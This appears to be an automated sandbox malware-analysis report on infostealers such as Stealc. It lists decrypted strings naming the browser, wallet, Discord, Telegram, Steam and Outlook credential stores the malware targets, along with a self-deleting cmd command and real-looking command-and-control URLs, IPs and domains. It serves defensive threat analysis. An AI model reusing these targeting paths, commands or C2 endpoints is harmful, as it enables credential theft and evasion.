Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: firefox
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: wallets
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ProductName
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: x32
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: x64
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ProcessorNameString
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: DisplayName
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: DisplayVersion
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Network Info:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - IP: IP?
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Country: ISO?
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: System Summary:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - HWID:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - OS:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Architecture:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - UserName:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Computer Name:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Local Time:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - UTC:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Language:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Keyboards:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Laptop:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Running Path:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - CPU:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Threads:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Cores:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - RAM:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - Display Resolution:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: - GPU:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: User Agents:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Installed Apps:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: All Users:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Current User:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Process List:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: system_info.txt
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: freebl3.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: mozglue.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: msvcp140.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: nss3.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: softokn3.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: vcruntime140.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \Temp\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: .exe
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: runas
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: open
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: /c start
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %DESKTOP%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %APPDATA%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %USERPROFILE%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %DOCUMENTS%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %RECENT%
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: *.lnk
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: files
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \discord\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \Telegram Desktop\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: key_datas
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: map*
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Telegram
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Tox
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: *.tox
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: *.ini
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Password
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 00000001
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 00000002
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 00000003
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 00000004
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Pidgin
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \.purple\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: accounts.xml
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: token:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Software\Valve\Steam
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SteamPath
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \config\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ssfn*
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: config.vdf
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: DialogConfig.vdf
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: libraryfolders.vdf
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: loginusers.vdf
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \Steam\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: browsers
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: done
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: soft
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: https
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: POST
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: HTTP/1.1
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: hwid
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: build
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: token
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: file_name
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: file
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: message
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: screenshot.jpg
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: servicedny.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: authorisev.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: faulteyotk.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: dilemmadu.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: contemteny.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: goalyfeastz.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: opposezmny.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: seallysl.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: computeryrati.site
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: - Screen Resoluton:
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: Workgroup: -
Source: 43.0.RDX123456.exe.700000.0.unpack	String decryptor: 4SD0y4--RLREBORN

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_00699B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	7_2_00699B60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	7_2_0069C820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_00697240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	7_2_00697240
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_00699AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	7_2_00699AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A8EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	7_2_006A8EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	7_2_6C0D6C80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C22A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	7_2_6C22A9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	7_2_6C1F4420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C224440 PK11_PrivDecrypt,	7_2_6C224440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2244C0 PK11_PubEncrypt,	7_2_6C2244C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	7_2_6C2725B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C208670 PK11_ExportEncryptedPrivKeyInfo,	7_2_6C208670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C22A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	7_2_6C22A650

Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_ff955e0e-6

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe

Unpacked PE file: 39.2.blurayplayer32.exe.400000.0.unpack

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BluRay Player_is1

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: YJJA1RDG0PY87AD1W2WB98M4U9.exe, 0000002F.00000002.3618334787.00000000002A2000.00000040.00000001.01000000.00000022.sdmp, YJJA1RDG0PY87AD1W2WB98M4U9.exe, 0000002F.00000003.3422047848.00000000048C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	7_2_0069E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_006A4910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	7_2_0069BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_006916D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	7_2_006A3EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_0069F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	7_2_0069DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A38B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	7_2_006A38B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A4570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	7_2_006A4570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	7_2_0069ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_0069DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	7_2_0069DE10

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: dilemmadu.site
Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: seallysl.site
Source: Malware configuration extractor	URLs: computeryrati.site
Source: Malware configuration extractor	URLs: servicedny.site
Source: Malware configuration extractor	URLs: csenhav.net
Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	IPs: 185.215.113.16
Source: Malware configuration extractor	URLs: home.sevjoi17vt.top
Source: Malware configuration extractor	URLs: sevjoi17vt.top
Source: Malware configuration extractor	URLs: 0/80/home.sevjoi17vt.top
Source: Malware configuration extractor	URLs: QUERY\|rd\|A\|IN\|home.sevjoi17vt.top
Source: Malware configuration extractor	URLs: .1.1home.sevjoi17vt.top
Source: Malware configuration extractor	URLs: 0/80/sevjoi17vt.top
Source: Malware configuration extractor	URLs: QUERY\|rd\|AAAA\|IN\|home.sevjoi17vt.top
Source: Malware configuration extractor	URLs: %gPsevjoi17vt.top

Source: Joe Sandbox View	IP Address: 52.168.117.173 52.168.117.173
Source: Joe Sandbox View	IP Address: 1.1.1.1 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_009DDFD0 recv,recv,recv,recv,

6_2_009DDFD0

Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://.css
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://.jpg
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/dl?name=mixnine
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.72.65/dl?name=mixnine9
Source: blurayplayer32.exe, 00000027.00000002.4804225320.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, blurayplayer32.exe, 00000027.00000002.4804225320.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.202/
Source: blurayplayer32.exe, 00000027.00000002.4804225320.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.202/en-GB
Source: blurayplayer32.exe, 00000027.00000002.4804225320.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.202/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e89d8
Source: blurayplayer32.exe, 00000027.00000002.4804225320.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.202/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
Source: 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4352385064.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/0L
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/E
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/G
Source: axplong.exe, 00000006.00000002.4838480992.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.4838480992.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.4838480992.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
Source: axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php0001
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
